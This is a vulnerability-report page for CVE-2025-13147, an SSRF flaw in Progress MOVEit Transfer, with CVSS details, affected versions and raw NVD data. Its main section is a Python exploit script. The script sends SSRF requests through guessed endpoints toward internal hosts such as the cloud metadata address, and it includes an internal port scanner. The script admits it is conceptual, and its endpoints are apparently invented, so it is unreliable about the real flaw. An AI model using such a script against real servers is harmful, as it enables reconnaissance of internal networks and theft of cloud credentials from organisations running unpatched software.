Security Vulnerability Report
中文
CVE-2025-13147 CVSS 5.3 MEDIUM

CVE-2025-13147

Published: 2025-11-19 21:15:49
Last Modified: 2025-11-24 14:58:20
Source: [email protected]

Description

Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer.This issue affects MOVEit Transfer: before 2024.1.8, from 2025.0.0 before 2025.0.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
MOVEit Transfer < 2024.1.8
MOVEit Transfer 2025.0.0 - 2025.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13147 SSRF PoC for Progress MOVEit Transfer # Target: Progress MOVEit Transfer < 2024.1.8 or < 2025.0.4 # Note: This is a conceptual PoC for educational purposes only import requests import sys from urllib.parse import quote def exploit_ssrf(target_url, internal_target): """ Exploit SSRF vulnerability in MOVEit Transfer Args: target_url: Base URL of MOVEit Transfer instance internal_target: Internal resource to target (e.g., internal IP, metadata endpoint) """ # Common MOVEit Transfer endpoints that might be vulnerable endpoints = [ '/api/v1/files/transfer', '/api/v1/folders/lookup', '/webapi/filedownload', '/MOVEitTransfer/api/transfer' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } for endpoint in endpoints: try: # SSRF payload - inject internal target via various parameters # Modify parameters based on actual target endpoint payload = { 'host': internal_target, # Common SSRF injection point 'port': '80', 'path': '/' } # Alternative payload using URL parameter ssrf_url = f"{target_url}{endpoint}?url={quote(internal_target)}" print(f"[*] Testing endpoint: {endpoint}") print(f"[*] SSRF URL: {ssrf_url}") # Send request response = requests.get(ssrf_url, headers=headers, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code != 404: print(f"[!] Potential SSRF - Response received") print(f"[*] Response preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") continue return False def scan_internal_ports(target_url, internal_ip): """ Scan internal ports using SSRF """ common_ports = [22, 80, 443, 3306, 5432, 6379, 8080, 8443] print(f"[*] Scanning internal ports on {internal_ip}...") for port in common_ports: try: # SSRF payload for port scanning target = f"http://{internal_ip}:{port}" ssrf_url = f"{target_url}/api/v1/lookup?host={quote(target)}" response = requests.get(ssrf_url, timeout=5, verify=False) if response.status_code < 500: print(f"[+] Port {port} appears to be OPEN") else: print(f"[-] Port {port}: Connection refused or filtered") except: print(f"[-] Port {port}: Timeout or error") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve_2025_13147_poc.py <target_url> <internal_target>") print("Example: python cve_2025_13147_poc.py https://victim.com http://169.254.169.254") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] print(f"[*] CVE-2025-13147 SSRF PoC") print(f"[*] Target: {target}") print(f"[*] Internal Target: {internal}") exploit_ssrf(target, internal)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13147", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:48.943", "lastModified": "2025-11-24T14:58:20.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer.This issue affects MOVEit Transfer: before 2024.1.8, from 2025.0.0 before 2025.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024.1.8", "matchCriteriaId": "39B74C50-5145-49E3-AC0C-7BF14F4886D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.0.0", "versionEndExcluding": "2025.0.4", "matchCriteriaId": "F8E7102F-7B5A-4617-9CDD-827DCCFB5BAF"}]}]}], "references": [{"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2024/page/Fixed-Issues-in-2024.1.8.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2025/page/Fixed-Issues-in-2025.0.4.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2025_1/page/Fixed-Issues-in-2025.1.html", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.